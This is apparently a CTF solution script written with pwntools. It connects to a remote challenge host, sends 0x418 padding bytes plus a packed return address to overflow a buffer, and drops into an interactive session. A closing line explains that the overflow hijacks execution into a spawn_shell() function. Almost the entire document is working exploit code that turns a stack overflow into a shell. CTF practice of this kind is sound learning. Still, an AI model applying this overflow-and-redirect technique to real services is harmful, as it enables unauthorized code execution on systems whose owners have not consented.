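from pwn import *
p = remote('ctf.j0n9hyun.xyz', 3015)  # connect to the challenge service
context.log_level = "debug"  # log all traffic sent and received
p.recv()  # read the service's initial output
payload = b'a' * 0x418 + p64(0x400897)  # 0x418 filler bytes (bytes literal, since p64() returns bytes), then the packed 64-bit address
p.sendline(payload)
p.interactive()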
Trigger a buffer overflow (BOF) in the getenv() function to execute the spawn_shell() function.